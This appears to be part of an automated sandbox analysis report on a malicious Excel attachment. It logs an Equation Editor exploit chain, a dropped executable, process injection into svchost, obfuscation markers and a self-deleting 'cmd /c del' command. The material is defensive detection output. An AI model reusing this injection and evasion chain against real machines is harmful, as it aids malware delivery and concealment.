Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe Code function: 6_2_01329C12 6_2_01329C12
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe Code function: 6_2_013296A0 6_2_013296A0
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe Code function: 6_2_01327E88 6_2_01327E88
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe Code function: 6_2_00A4E0C6 6_2_00A4E0C6
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe Code function: 6_2_00A7D005 6_2_00A7D005
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe Code function: 6_2_00A53040 6_2_00A53040
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe Code function: 6_2_00A6905A 6_2_00A6905A
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe Code function: 6_2_00A4E2E9 6_2_00A4E2E9
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe Code function: 6_2_00AF1238 6_2_00AF1238
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe Code function: 6_2_00AF63BF 6_2_00AF63BF
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe Code function: 6_2_00A4F3CF 6_2_00A4F3CF
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe Code function: 6_2_00A763DB 6_2_00A763DB
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe Code function: 6_2_00A52305 6_2_00A52305
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe Code function: 6_2_00A9A37B 6_2_00A9A37B
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe Code function: 6_2_00A57353 6_2_00A57353
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe Code function: 6_2_00A85485 6_2_00A85485
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe Code function: 6_2_00A61489 6_2_00A61489
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe Code function: 6_2_00A8D47D 6_2_00A8D47D
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe Code function: 6_2_00A6C5F0 6_2_00A6C5F0
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe Code function: 6_2_00A5351F 6_2_00A5351F
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe Code function: 6_2_00A96540 6_2_00A96540
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe Code function: 6_2_00A54680 6_2_00A54680
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe Code function: 6_2_00A5E6C1 6_2_00A5E6C1
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe Code function: 6_2_00AF2622 6_2_00AF2622
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe Code function: 6_2_00A9A634 6_2_00A9A634
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe Code function: 6_2_00A5C7BC 6_2_00A5C7BC
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe Code function: 6_2_00AD579A 6_2_00AD579A
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe Code function: 6_2_00A857C3 6_2_00A857C3
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe Code function: 6_2_00AEF8EE 6_2_00AEF8EE
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe Code function: 6_2_00A7286D 6_2_00A7286D
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe Code function: 6_2_00A5C85C 6_2_00A5C85C
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe Code function: 6_2_00A529B2 6_2_00A529B2
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe Code function: 6_2_00AF098E 6_2_00AF098E
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe Code function: 6_2_00A669FE 6_2_00A669FE
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe Code function: 6_2_00AD5955 6_2_00AD5955
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe Code function: 6_2_00B03A83 6_2_00B03A83
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe Code function: 6_2_00AFCBA4 6_2_00AFCBA4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0072D06D 8_2_0072D06D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_006B3040 8_2_006B3040
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_006C905A 8_2_006C905A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_006DD005 8_2_006DD005
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_006AE0C6 8_2_006AE0C6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_00751238 8_2_00751238
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_006AE2E9 8_2_006AE2E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_006FA37B 8_2_006FA37B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_006B7353 8_2_006B7353
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_006B2305 8_2_006B2305
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_006AF3CF 8_2_006AF3CF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_006D63DB 8_2_006D63DB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_007563BF 8_2_007563BF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_006ED47D 8_2_006ED47D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0073443E 8_2_0073443E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_006C1489 8_2_006C1489
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_006E5485 8_2_006E5485
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_006F6540 8_2_006F6540
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_006B351F 8_2_006B351F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_006CC5F0 8_2_006CC5F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_00752622 8_2_00752622
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_006FA634 8_2_006FA634
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_006BE6C1 8_2_006BE6C1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_006B4680 8_2_006B4680
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_006E57C3 8_2_006E57C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_006BC7BC 8_2_006BC7BC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0073579A 8_2_0073579A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_006D286D 8_2_006D286D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_006BC85C 8_2_006BC85C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0074F8EE 8_2_0074F8EE
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_00735955 8_2_00735955
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0073394B 8_2_0073394B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_006C69FE 8_2_006C69FE
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_006B29B2 8_2_006B29B2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0075098E 8_2_0075098E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_00763A83 8_2_00763A83
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_006D7B00 8_2_006D7B00
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0073DBDA 8_2_0073DBDA
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0075CBA4 8_2_0075CBA4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_006BCD5B 8_2_006BCD5B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_006E0D3B 8_2_006E0D3B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0074FDDD 8_2_0074FDDD
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_006CEE4C 8_2_006CEE4C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_006E2E2F 8_2_006E2E2F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_006DDF7C 8_2_006DDF7C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_006C0F3F 8_2_006C0F3F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_00722FDC 8_2_00722FDC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0074CFB1 8_2_0074CFB1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0011E0B6 8_2_0011E0B6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0011E79E 8_2_0011E79E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0011E819 8_2_0011E819
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_00102D90 8_2_00102D90
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_00102D89 8_2_00102D89
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_00109E5B 8_2_00109E5B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_00109E60 8_2_00109E60
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_00102FB0 8_2_00102FB0
Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe Code function: String function: 00A4DF5C appears 89 times
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe Code function: String function: 00A9373B appears 176 times
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe Code function: String function: 00A93F92 appears 71 times
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe Code function: String function: 00ABF970 appears 56 times
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe Code function: String function: 01324599 appears 38 times
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe Code function: String function: 01322400 appears 54 times
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 006AE2A8 appears 38 times
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 0071F970 appears 84 times
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 006ADF5C appears 121 times
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 006F373B appears 245 times
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 006F3F92 appears 132 times
Contains functionality to call native functions
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe Code function: 6_2_0041A360 NtCreateFile, 6_2_0041A360
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe Code function: 6_2_0041A410 NtReadFile, 6_2_0041A410
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe Code function: 6_2_0041A490 NtClose, 6_2_0041A490
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe Code function: 6_2_0041A540 NtAllocateVirtualMemory, 6_2_0041A540
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe Code function: 6_2_0041A35A NtCreateFile, 6_2_0041A35A
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe Code function: 6_2_0041A40A NtReadFile, 6_2_0041A40A
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe Code function: 6_2_0041A53A NtAllocateVirtualMemory, 6_2_0041A53A
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe Code function: 6_2_00A400C4 NtCreateFile,LdrInitializeThunk, 6_2_00A400C4
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe Code function: 6_2_00A40078 NtResumeThread,LdrInitializeThunk, 6_2_00A40078
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe Code function: 6_2_00A40048 NtProtectVirtualMemory,LdrInitializeThunk, 6_2_00A40048
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe Code function: 6_2_00A3F9F0 NtClose,LdrInitializeThunk, 6_2_00A3F9F0
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe Code function: 6_2_00A3F900 NtReadFile,LdrInitializeThunk, 6_2_00A3F900
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe Code function: 6_2_00A3FAE8 NtQueryInformationProcess,LdrInitializeThunk, 6_2_00A3FAE8
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe Code function: 6_2_00A3FAD0 NtAllocateVirtualMemory,LdrInitializeThunk, 6_2_00A3FAD0
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe Code function: 6_2_00A3FBB8 NtQueryInformationToken,LdrInitializeThunk, 6_2_00A3FBB8
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe Code function: 6_2_00A3FB68 NtFreeVirtualMemory,LdrInitializeThunk, 6_2_00A3FB68
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe Code function: 6_2_00A3FC90 NtUnmapViewOfSection,LdrInitializeThunk, 6_2_00A3FC90
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe Code function: 6_2_00A3FC60 NtMapViewOfSection,LdrInitializeThunk, 6_2_00A3FC60
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe Code function: 6_2_00A3FD8C NtDelayExecution,LdrInitializeThunk, 6_2_00A3FD8C
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe Code function: 6_2_00A3FDC0 NtQuerySystemInformation,LdrInitializeThunk, 6_2_00A3FDC0
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe Code function: 6_2_00A3FEA0 NtReadVirtualMemory,LdrInitializeThunk, 6_2_00A3FEA0
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe Code function: 6_2_00A3FED0 NtAdjustPrivilegesToken,LdrInitializeThunk, 6_2_00A3FED0
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe Code function: 6_2_00A3FFB4 NtCreateSection,LdrInitializeThunk, 6_2_00A3FFB4
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe Code function: 6_2_00A410D0 NtOpenProcessToken, 6_2_00A410D0
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe Code function: 6_2_00A40060 NtQuerySection, 6_2_00A40060
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe Code function: 6_2_00A401D4 NtSetValueKey, 6_2_00A401D4
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe Code function: 6_2_00A4010C NtOpenDirectoryObject, 6_2_00A4010C
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe Code function: 6_2_00A41148 NtOpenThread, 6_2_00A41148
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe Code function: 6_2_00A407AC NtCreateMutant, 6_2_00A407AC
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe Code function: 6_2_00A3F8CC NtWaitForSingleObject, 6_2_00A3F8CC
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe Code function: 6_2_00A41930 NtSetContextThread, 6_2_00A41930
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe Code function: 6_2_00A3F938 NtWriteFile, 6_2_00A3F938
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe Code function: 6_2_00A3FAB8 NtQueryValueKey, 6_2_00A3FAB8
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe Code function: 6_2_00A3FA20 NtQueryInformationFile, 6_2_00A3FA20
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe Code function: 6_2_00A3FA50 NtEnumerateValueKey, 6_2_00A3FA50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_006A00C4 NtCreateFile,LdrInitializeThunk, 8_2_006A00C4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_006A07AC NtCreateMutant,LdrInitializeThunk, 8_2_006A07AC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0069F900 NtReadFile,LdrInitializeThunk, 8_2_0069F900
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0069F9F0 NtClose,LdrInitializeThunk, 8_2_0069F9F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0069FAE8 NtQueryInformationProcess,LdrInitializeThunk, 8_2_0069FAE8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0069FAD0 NtAllocateVirtualMemory,LdrInitializeThunk, 8_2_0069FAD0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0069FAB8 NtQueryValueKey,LdrInitializeThunk, 8_2_0069FAB8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0069FB68 NtFreeVirtualMemory,LdrInitializeThunk, 8_2_0069FB68
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0069FB50 NtCreateKey,LdrInitializeThunk, 8_2_0069FB50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0069FBB8 NtQueryInformationToken,LdrInitializeThunk, 8_2_0069FBB8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0069FC60 NtMapViewOfSection,LdrInitializeThunk, 8_2_0069FC60
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0069FDC0 NtQuerySystemInformation,LdrInitializeThunk, 8_2_0069FDC0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0069FD8C NtDelayExecution,LdrInitializeThunk, 8_2_0069FD8C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0069FED0 NtAdjustPrivilegesToken,LdrInitializeThunk, 8_2_0069FED0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0069FFB4 NtCreateSection,LdrInitializeThunk, 8_2_0069FFB4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_006A0060 NtQuerySection, 8_2_006A0060
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_006A0078 NtResumeThread, 8_2_006A0078
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_006A0048 NtProtectVirtualMemory, 8_2_006A0048
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_006A10D0 NtOpenProcessToken, 8_2_006A10D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_006A1148 NtOpenThread, 8_2_006A1148
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_006A010C NtOpenDirectoryObject, 8_2_006A010C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_006A01D4 NtSetValueKey, 8_2_006A01D4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0069F8CC NtWaitForSingleObject, 8_2_0069F8CC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0069F938 NtWriteFile, 8_2_0069F938
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_006A1930 NtSetContextThread, 8_2_006A1930
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0069FA50 NtEnumerateValueKey, 8_2_0069FA50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0069FA20 NtQueryInformationFile, 8_2_0069FA20
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0069FBE8 NtQueryVirtualMemory, 8_2_0069FBE8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0069FC48 NtSetInformationFile, 8_2_0069FC48
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_006A0C40 NtGetContextThread, 8_2_006A0C40
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0069FC30 NtOpenProcess, 8_2_0069FC30
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0069FC90 NtUnmapViewOfSection, 8_2_0069FC90
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0069FD5C NtEnumerateKey, 8_2_0069FD5C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_006A1D80 NtSuspendThread, 8_2_006A1D80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0069FE24 NtWriteVirtualMemory, 8_2_0069FE24
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0069FEA0 NtReadVirtualMemory, 8_2_0069FEA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0069FF34 NtQueueApcThread, 8_2_0069FF34
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0069FFFC NtCreateProcessEx, 8_2_0069FFFC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0011A360 NtCreateFile, 8_2_0011A360
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0011A410 NtReadFile, 8_2_0011A410
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0011A490 NtClose, 8_2_0011A490
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0011A540 NtAllocateVirtualMemory, 8_2_0011A540
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0011A35A NtCreateFile, 8_2_0011A35A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0011A40A NtReadFile, 8_2_0011A40A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0011A53A NtAllocateVirtualMemory, 8_2_0011A53A
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Memory allocated: 77620000 page execute and read and write Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Memory allocated: 77740000 page execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: 77620000 page execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: 77740000 page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe Memory allocated: 77620000 page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe Memory allocated: 77740000 page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe Memory allocated: 77620000 page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe Memory allocated: 77740000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Memory allocated: 77620000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Memory allocated: 77740000 page execute and read and write Jump to behavior
Source: New order.xlsx Virustotal: Detection: 40%
Source: New order.xlsx ReversingLabs: Detection: 34%
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
Source: C:\Users\Public\vbc.exe Process created: C:\Users\user\AppData\Local\Temp\fdvucso.exe C:\Users\user\AppData\Local\Temp\fdvucso.exe C:\Users\user\AppData\Local\Temp\wqqynoeqp
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe Process created: C:\Users\user\AppData\Local\Temp\fdvucso.exe C:\Users\user\AppData\Local\Temp\fdvucso.exe C:\Users\user\AppData\Local\Temp\wqqynoeqp
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe
Source: C:\Windows\SysWOW64\svchost.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\fdvucso.exe"
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe" Jump to behavior
Source: C:\Users\Public\vbc.exe Process created: C:\Users\user\AppData\Local\Temp\fdvucso.exe C:\Users\user\AppData\Local\Temp\fdvucso.exe C:\Users\user\AppData\Local\Temp\wqqynoeqp Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe Process created: C:\Users\user\AppData\Local\Temp\fdvucso.exe C:\Users\user\AppData\Local\Temp\fdvucso.exe C:\Users\user\AppData\Local\Temp\wqqynoeqp Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\fdvucso.exe" Jump to behavior
Source: C:\Users\Public\vbc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32 Jump to behavior
Source: C:\Users\Public\vbc.exe Code function: 4_2_00403646 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 4_2_00403646
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$New order.xlsx Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVR63E0.tmp Jump to behavior
Source: classification engine Classification label: mal100.troj.expl.evad.winXLSX@11/16@2/2
Source: C:\Users\Public\vbc.exe Code function: 4_2_004021AA CoCreateInstance, 4_2_004021AA
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\Public\vbc.exe Code function: 4_2_00404ABB GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW, 4_2_00404ABB
Source: explorer.exe, 00000007.00000000.993234664.0000000003B10000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: .VBPud<_
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: C:\lmwlf\ciwera\wcsu\ec524832ab3648f5b1c9c3185cc05774\hsjgbq\tqrenmhx\Release\tqrenmhx.pdb source: vbc.exe, 00000004.00000002.996335800.0000000000789000.00000004.00000001.01000000.00000004.sdmp, fdvucso.exe, 00000005.00000000.977201481.000000000132E000.00000002.00000001.01000000.00000005.sdmp, fdvucso.exe, 00000005.00000002.985046531.000000000132E000.00000002.00000001.01000000.00000005.sdmp, fdvucso.exe, 00000006.00000000.980432583.000000000132E000.00000002.00000001.01000000.00000005.sdmp, svchost.exe, 00000008.00000002.1171414662.000000000023C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.1171982272.0000000000D2F000.00000004.10000000.00040000.00000000.sdmp, fdvucso.exe.4.dr, nsbF6CE.tmp.4.dr
Source: Binary string: wntdll.pdb source: fdvucso.exe, fdvucso.exe, 00000006.00000003.984908261.0000000000430000.00000004.00000800.00020000.00000000.sdmp, fdvucso.exe, 00000006.00000002.1036425899.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, fdvucso.exe, 00000006.00000002.1035304413.0000000000A30000.00000040.00000800.00020000.00000000.sdmp, fdvucso.exe, 00000006.00000003.986623998.00000000008A0000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000008.00000002.1171527322.0000000000690000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1034856361.0000000000380000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.1171735626.0000000000810000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1036048676.0000000000500000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: svchost.pdb source: fdvucso.exe, 00000006.00000002.1035230712.00000000007B4000.00000004.00000020.00020000.00000000.sdmp, fdvucso.exe, 00000006.00000002.1034825185.0000000000030000.00000040.10000000.00040000.00000000.sdmp
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe Code function: 5_2_01322445 push ecx; ret 5_2_01322458
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe Code function: 6_2_00417811 push cs; ret 6_2_00417815
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe Code function: 6_2_0041E9F4 push ds; ret 6_2_0041E9F8
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe Code function: 6_2_00416495 push edx; retf 6_2_004164A0
